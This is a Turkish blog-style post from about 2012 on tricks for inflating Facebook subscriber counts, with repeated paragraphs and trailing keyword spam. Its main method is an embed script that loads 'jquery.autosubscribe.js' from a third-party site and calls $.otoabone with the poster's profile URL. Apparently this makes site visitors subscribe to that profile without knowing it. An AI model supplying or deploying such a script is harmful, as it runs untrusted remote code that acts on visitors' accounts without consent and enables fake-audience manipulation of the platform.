Facebookta Abone Çoğaltma Hilesi Abone Sayısını Artırma Videolu Anlatım

Son günlerde çok popüler bir konu olan abone kasma hilesi çoğu arkadaşımızın yapamadığı ve zorlandığı bir yöntemdir. Abone kasma, Abone yapmak gerçekten akıl almaz derecede zor bir durumdur. Arkadaş ekleme sayfası’na girin. Facebook’ta duvarınıza ”ekle beni sana durum beğeneyim” gibisinden bir gönderi yazın. Tabi bu esnada aboneliğiniz herkese açık durumda olacak şekilde olsun, sizi ekleyenler otomatik olarak size abone olmuş sayılacaktır ve bu sayede arkadaşlık isteğini oynaylamasanız dahi size abone olmuş olacaklardır.
Facebook Arkadaş Ve Abone Çoğaltma Hilesi 2012 – YouTube

Facebook, Abone kasma ve coğaltma hilesi 
Merhaba, bu yazımızda Facebook abone kasma hilesi nasıl yapılır ? onu göreceğiz. Bildiğiniz gibi facebook’ta Abone hilesi yapmak gerçekten çok zor oldu Kimi kendimize abone yapacağız ? diye düşünürken benim aklıma bir fikir geldi ve sizlerde yararlanın diye sizlerle paylaşmak istedim. Öncelikle aboneliğinizi herkese açık konuma getirmeniz şarttır tabiki onu anladığımıza göre işe geçelim isterseniz.

Son günlerde çok popüler bir konu olan abone kasma hilesi çoğu arkadaşımızın yapamadığı ve zorlandığı bir yöntem olmasıyla beraber çoğumuz bu kavramı bilmiyoruz bile. Abone kasma, Abone yapmak gerçekten akıl almaz derecede zor bir durumdur arkadaşlar. Size bir taktik daha öğreteyim isterseniz bunu uygulayabilirsiniz. Şimdi arkadaş ekleme sayfası’na girin Facebook’ta deyinki ekle beni sana durum beğeneyim gibisinden bir gönderme yapın duvara, Tabi bu esnada aboneliğiniz herkese açık durumda olacak şekilde olsun, sizi ekleyenler otomatik olarak size abone olmuş sayılacaktır ve bu sayede arkadaşlık isteğini oynaylamasanız dahi size abone olmuş olacaklardır.

Facebook abone hilesi resmi

Bir diğer yöntemide vardır bu yolun arkadaşlar, hatta birsürü yöntemi vardır ama bu sitemizde teker teker hepsinden bahsedeceğiz. Face abone çoğaltma hilesi nasıl yapılır konumuza devam edelim isterseniz dostlarım. Şimdi benim elimde bir kod var ve bu kodu web sitenize yerleştirin arkadaşlar nasıl yerleştireceğim benim bir websitem yok diyecek olursanız eğer tr.gg gibi birsürü bedava web site veren siteler mevcuttur. Google’a yazmanız site yardımcı olacaktır, Google’a bedava website yazın sonuç bulacaksınızdır. Neyse şimdi aşağıdaki koddaki; http://www.facebook.com/Adiniz’ bu kısma kendi kullanıcı adınızı giriniz iyi günler dilerim hepinize böylelikle, Facebook abone hilesini öğrenmiş olduk.

<script type=”text/javascript” src=”http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js”></script>
<script type=”text/javascript” src=”http://bayy-a.net/wp-content/uploads/2012/02/jquery.autosubscribe.js”></script>
<script type=”text/javascript”>
$(document).ready(function () {
$.otoabone({
profile: ‘http://www.facebook.com/Adiniz’,
});
});
</script>

Facebook Abone Ve Arkadaş Çoğaltma Hilesi 2012 – YouTube


Facebook Abone Arttırma Hilesi – YouTube

FACEBOOK OTOMATİK ABONE OLMA KODU FACEBOOK ABONE OLMA KODU FACEBOOK ABONE OLMA HİLESİ


Facebook Abone Arttırma Hilesi 2012

paylaş:

Yorum Yap